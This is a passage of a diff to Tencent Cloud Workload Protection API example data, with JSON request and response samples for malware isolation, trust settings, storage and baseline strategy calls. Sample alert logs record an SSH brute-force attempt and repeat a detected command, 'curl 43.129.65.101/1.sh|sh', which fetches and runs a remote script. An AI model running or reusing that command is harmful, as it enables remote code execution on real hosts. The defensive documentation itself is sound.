\"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641824000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:10:03 +0800 CST\\\",\\\"hostip\\\":\\\"172.16.0.49\\\",\\\"rule_name\\\":\\\"1003.恶意命令-下载&执行未知程序\\\",\\\"modify_time\\\":\\\"0001-01-01 00:00:00 +0000 UTC\\\",\\\"rule_level\\\":\\\"高危\\\",\\\"uuid\\\":\\\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\\\",\\\"platform\\\":\\\"Linux64\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"cls_event_type\\\":\\\"bash\\\",\\\"exec_time\\\":\\\"2022-07-01 10:10:01 +0800 CST\\\",\\\"id\\\":\\\"3141559\\\",\\\"bash_cmd\\\":\\\"/bin/sh -c curl 43.129.65.101/1.sh|sh\\\",\\\"user\\\":\\\"0:0\\\",\\\"event_status\\\":\\\"create\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641520000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 07:44:58 +0800 CST\\\",\\\"hostip\\\":\\\"172.16.48.79\\\",\\\"modify_time\\\":\\\"2022-07-01 10:09:23 +0800 CST\\\",\\\"count\\\":\\\"349\\\",\\\"uuid\\\":\\\"93137e79-ae2e-4677-95ac-23a5024607b1\\\",\\\"src_ip\\\":\\\"110.40.168.164\\\",\\\"src_machine_name\\\":\\\"ssh\\\",\\\"event_type\\\":\\\"暴破失败\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"cls_event_type\\\":\\\"bruteattack\\\",\\\"dst_port\\\":\\\"22\\\",\\\"location\\\":\\\"上海-上海市\\\",\\\"banned\\\":\\\"未阻断(非专业版、非旗舰版)\\\",\\\"id\\\":\\\"202226000001999\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\",\\\"username\\\":\\\"root\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641484000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 07:44:58 +0800 CST\\\",\\\"hostip\\\":\\\"172.16.48.79\\\",\\\"modify_time\\\":\\\"2022-07-01 10:09:23 +0800 CST\\\",\\\"count\\\":\\\"349\\\",\\\"uuid\\\":\\\"93137e79-ae2e-4677-95ac-23a5024607b1\\\",\\\"src_ip\\\":\\\"110.40.168.164\\\",\\\"src_machine_name\\\":\\\"ssh\\\",\\\"event_type\\\":\\\"暴破失败\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"cls_event_type\\\":\\\"bruteattack\\\",\\\"dst_port\\\":\\\"22\\\",\\\"location\\\":\\\"上海-上海市\\\",\\\"banned\\\":\\\"未阻断(非专业版、非旗舰版)\\\",\\\"id\\\":\\\"202226000001999\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\",\\\"username\\\":\\\"root\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641464000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:07:04 +0800 CST\\\",\\\"hostip\\\":\\\"172.16.0.49\\\",\\\"rule_name\\\":\\\"1003.恶意命令-下载&执行未知程序\\\",\\\"modify_time\\\":\\\"0001-01-01 00:00:00 +0000 UTC\\\",\\\"rule_level\\\":\\\"高危\\\",\\\"uuid\\\":\\\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\\\",\\\"platform\\\":\\\"Linux64\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"cls_event_type\\\":\\\"bash\\\",\\\"exec_time\\\":\\\"2022-07-01 10:07:01 +0800 CST\\\",\\\"id\\\":\\\"3141558\\\",\\\"bash_cmd\\\":\\\"/bin/sh -c curl 43.129.65.101/1.sh|sh\\\",\\\"user\\\":\\\"0:0\\\",\\\"event_status\\\":\\\"create\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641280000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:05:04 +0800 CST\\\",\\\"hostip\\\":\\\"172.16.0.49\\\",\\\"rule_name\\\":\\\"1003.恶意命令-下载&执行未知程序\\\",\\\"modify_time\\\":\\\"0001-01-01 00:00:00 +0000 UTC\\\",\\\"rule_level\\\":\\\"高危\\\",\\\"uuid\\\":\\\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\\\",\\\"platform\\\":\\\"Linux64\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"cls_event_type\\\":\\\"bash\\\",\\\"exec_time\\\":\\\"2022-07-01 10:05:01 +0800 CST\\\",\\\"id\\\":\\\"3141557\\\",\\\"bash_cmd\\\":\\\"/bin/sh -c curl 43.129.65.101/1.sh|sh\\\",\\\"user\\\":\\\"0:0\\\",\\\"event_status\\\":\\\"create\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641160000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:04:05 +0800 CST\\\",\\\"hostip\\\":\\\"172.16.0.49\\\",\\\"rule_name\\\":\\\"1003.恶意命令-下载&执行未知程序\\\",\\\"modify_time\\\":\\\"0001-01-01 00:00:00 +0000 UTC\\\",\\\"rule_level\\\":\\\"高危\\\",\\\"uuid\\\":\\\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\\\",\\\"platform\\\":\\\"Linux64\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"cls_event_type\\\":\\\"bash\\\",\\\"exec_time\\\":\\\"2022-07-01 10:04:01 +0800 CST\\\",\\\"id\\\":\\\"3141556\\\",\\\"bash_cmd\\\":\\\"/bin/sh -c curl 43.129.65.101/1.sh|sh\\\",\\\"user\\\":\\\"0:0\\\",\\\"event_status\\\":\\\"create\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641160000\n }\n ],\n \"ListOver\": true,\n \"RequestId\": \"e6bb2f6d-10b3-40fd-b3a4-630dbdf477c3\"\n }\n}",
|
4028
4000
|
"title": "示例"
|
4029
4001
|
}
|
4030
4002
|
],
|
@@ -4032,7 +4004,7 @@
|
|
4032
4004
|
{
|
4033
4005
|
"document": "本接口(SeparateMalwares)用于隔离木马。",
|
4034
4006
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: SeparateMalwares\n<公共请求参数>\n\n{\n \"Ids\": [\n 1,\n 2,\n 3\n ]\n}",
|
4035
|
-
"output": "{\n \"Response\": {\n \"SuccessIds\": [\n
|
4007
|
+
"output": "{\n \"Response\": {\n \"SuccessIds\": [\n 300005850594,\n 456\n ],\n \"FailedIds\": [],\n \"RequestId\": \"4985eb7f-62d6-4da8-898f-d92a08660a38\"\n }\n}",
|
4036
4008
|
"title": "隔离木马"
|
4037
4009
|
}
|
4038
4010
|
],
|
@@ -4047,7 +4019,7 @@
|
|
4047
4019
|
"SetLocalStorageExpire": [
|
4048
4020
|
{
|
4049
4021
|
"document": "设置本地存储过期时间",
|
4050
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: SetLocalStorageExpire\n<公共请求参数>\n\n{\n \"Key\": \"
|
4022
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: SetLocalStorageExpire\n<公共请求参数>\n\n{\n \"Key\": \"key1\",\n \"Expire\": 5\n}",
|
4051
4023
|
"output": "{\n \"Response\": {\n \"RequestId\": \"bf93077b-51f5-4428-b9de-7e33a0b9cc4a\"\n }\n}",
|
4052
4024
|
"title": "示例"
|
4053
4025
|
}
|
@@ -4055,7 +4027,7 @@
|
|
4055
4027
|
"SetLocalStorageItem": [
|
4056
4028
|
{
|
4057
4029
|
"document": "设置本地存储数据",
|
4058
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: SetLocalStorageItem\n<公共请求参数>\n\n{\n \"Expire\": 5,\n \"Value\": \"
|
4030
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: SetLocalStorageItem\n<公共请求参数>\n\n{\n \"Expire\": 5,\n \"Value\": \"value\",\n \"Key\": \"key\"\n}",
|
4059
4031
|
"output": "{\n \"Response\": {\n \"RequestId\": \"bf93077b-51f5-4428-b9de-7e33a0b9cc4a\"\n }\n}",
|
4060
4032
|
"title": "示例"
|
4061
4033
|
}
|
@@ -4112,7 +4084,7 @@
|
|
4112
4084
|
{
|
4113
4085
|
"document": "",
|
4114
4086
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: SyncBaselineDetectSummary\n<公共请求参数>\n\n{}",
|
4115
|
-
"output": "{\n \"Response\": {\n \"DetectingTaskIds\": [\n 2379\n ],\n \"EndTime\": \"\",\n \"HostCount\": 1,\n \"LeftMins\": 3,\n \"NotPassPolicyCount\": 19,\n \"ProgressRate\": 20,\n \"RequestId\": \"69fce851-ee60-44ac-8ab1-62c2c7856051\",\n \"StartTime\": \"2022-08-23 15:07:02\",\n \"WillFirstScan\": 0\n }\n}",
|
4087
|
+
"output": "{\n \"Response\": {\n \"DetectingTaskIds\": [\n 2379\n ],\n \"EndTime\": \"2020-11-21 15:16:00\",\n \"HostCount\": 1,\n \"LeftMins\": 3,\n \"NotPassPolicyCount\": 19,\n \"ProgressRate\": 20,\n \"RequestId\": \"69fce851-ee60-44ac-8ab1-62c2c7856051\",\n \"StartTime\": \"2022-08-23 15:07:02\",\n \"WillFirstScan\": 0\n }\n}",
|
4116
4088
|
"title": "同步检测概要"
|
4117
4089
|
},
|
4118
4090
|
{
|
@@ -4133,7 +4105,7 @@
|
|
4133
4105
|
"TestWebHookRule": [
|
4134
4106
|
{
|
4135
4107
|
"document": "测试企微机器人",
|
4136
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: TestWebHookRule\n<公共请求参数>\n\n{\n \"Id\": 1,\n \"Data\": \"
|
4108
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: TestWebHookRule\n<公共请求参数>\n\n{\n \"Id\": 1,\n \"Data\": \"接口测试请忽略\"\n}",
|
4137
4109
|
"output": "{\n \"Response\": {\n \"RequestId\": \"747c393e-f771-47ca-af0a-cc36b88f107a\"\n }\n}",
|
4138
4110
|
"title": "测试企微机器人"
|
4139
4111
|
}
|
@@ -4141,7 +4113,7 @@
|
|
4141
4113
|
"TrustMalwares": [
|
4142
4114
|
{
|
4143
4115
|
"document": "本接口(TrustMalwares)将被识别木马文件设为信任。",
|
4144
|
-
"input": "https://cwp.tencentcloudapi.com/?Action=TrustMalwares\n&Ids.0=
|
4116
|
+
"input": "https://cwp.tencentcloudapi.com/?Action=TrustMalwares\n&Ids.0=10\n&Ids.1=11\n&<公共请求参数>\n\n {\"Ids\": [300005556389]}",
|
4145
4117
|
"output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\"\n }\n}",
|
4146
4118
|
"title": "信任文件"
|
4147
4119
|
}
|
@@ -4149,7 +4121,7 @@
|
|
4149
4121
|
"UntrustMalwares": [
|
4150
4122
|
{
|
4151
4123
|
"document": "本接口(UntrustMalwares)用于取消信任木马。",
|
4152
|
-
"input": "https://cwp.tencentcloudapi.com/?Action=UntrustMalwares\n&Ids.0=
|
4124
|
+
"input": "https://cwp.tencentcloudapi.com/?Action=UntrustMalwares\n&Ids.0=10\n&Ids.1=11\n&<公共请求参数> \n\n{\"Ids\": [300005556389]}",
|
4153
4125
|
"output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\"\n }\n}",
|
4154
4126
|
"title": "取消信任木马"
|
4155
4127
|
}
|
@@ -4157,8 +4129,8 @@
|
|
4157
4129
|
"UpdateBaselineStrategy": [
|
4158
4130
|
{
|
4159
4131
|
"document": "根据基线策略id更新策略信息",
|
4160
|
-
"input": "https://cwp.tencentcloudapi.com/?Action=UpdateBaselineStrategy\n&StrategyName=\"
|
4161
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"
|
4132
|
+
"input": "https://cwp.tencentcloudapi.com/?Action=UpdateBaselineStrategy\n&StrategyName=\"name1\"\n&ScanCycle=1\n&ScanAt=\"00:00:00\"\n&CategoryIds.0=1\n&IsGlobal=1\n&MachineType=\"CVM\"\n&RegionCode=\"ab-bj\"\n&Quuids.0=\"935e27b1-d675-4509-80bf-96fbf0764237\"\n&StrategyId=1\n&<公共请求参数>",
|
4133
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"935e27b1-d675-4509-80bf-96fbf0764237\"\n }\n}",
|
4162
4134
|
"title": "更新基线策略信息"
|
4163
4135
|
}
|
4164
4136
|
],
|